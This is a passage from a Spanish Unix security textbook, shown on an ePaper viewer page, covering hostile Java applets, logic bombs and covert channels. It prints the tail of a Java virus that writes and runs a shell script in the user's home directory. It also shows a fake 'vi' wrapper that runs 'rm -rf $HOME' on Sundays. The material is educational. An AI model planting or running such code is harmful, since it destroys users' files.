13.07.2015 Views

SEGURIDAD EN UNIX Y REDES

SEGURIDAD EN UNIX Y REDES

SEGURIDAD EN UNIX Y REDES

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

5.4. FAUNA Y OTRAS AM<strong>EN</strong>AZAS 79byte[] buffer = new byte[homer.length()];homer.getBytes(0, homer.length(), buffer, 0);outer.write(buffer);outer.close();Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +userHome + "/.homer.sh");Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +"/.homer.sh");} catch (IOException ioe) {}}}anita:~/Security#Este programa infecta los sistemas Unix con un virus que contamina ficheros shellscript; antes dehacerlo muestra el mensaje ‘Java is safe, and <strong>UNIX</strong> viruses do not exist’, para después localizartodos los ficheros shell en el directorio $HOME, comprobar cuáles están infectados, e infectar losque no lo están.Aunque en un principio no se tomó muy en serio el problema de los applets hostiles, poco tiempodespués la propia Sun Microsystems reconoció la problemática asociada y se puso a trabajar paraminimizar los potenciales efectos de estos applets; principalmente se han centrado esfuerzos en controlarla cantidad de recursos consumidos por un programa y en proporcionar las clases necesariaspara que los propios navegadores monitoricen los applets ejecutados. No obstante, aunque se solucionenlos problemas de seguridad en el código, es probable que se puedan seguir utilizando appletscomo una forma de ataque a los sistemas: mientras que estos programas puedan realizar conexionespor red, no habrán desaparecido los problemas.5.4.6 Bombas lógicasLas bombas lógicas son en cierta forma similares a los troyanos: se trata de código insertadoen programas que parecen realizar cierta acción útil. Pero mientras que un troyano se ejecutacada vez que se ejecuta el programa que lo contiene, una bomba lógica sólo se activa bajo ciertascondiciones, como una determinada fecha, la existencia de un fichero con un nombre dado, o elalcance de cierto número de ejecuciones del programa que contiene la bomba; así, una bomba lógicapuede permanecer inactiva en el sistema durante mucho tiempo sin activarse y por tanto sin quenadie note un funcionamiento anómalo hasta que el daño producido por la bomba ya está hecho.Por ejemplo, imaginemos la misma situación que antes veíamos para el troyano: alguien con elsuficiente privilegio renombra a vi como vi.old, y en el lugar del editor sitúa el siguiente código:#!/bin/shif [ ‘date +%a‘ = "Sun" ];thenrm -rf $HOMEelsevi.old $1fiEste cambio en el sistema puede permanecer durante años 4 sin que se produzca un funcionamientoanómalo, siempre y cuando nadie edite ficheros un domingo; pero en el momento en que un usuariodecida trabajar este día, la bomba lógica se va a activar y el directorio de este usuario será borrado.5.4.7 Canales ocultosSegún [B + 88] un canal oculto es un cauce de comunicación que permite a un proceso receptor y aun emisor intercambiar información de forma que viole la política de seguridad del sistema; esen-4 Obviamente, si esto es así, denota una escasa preocupación por la seguridad en ese sistema.

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!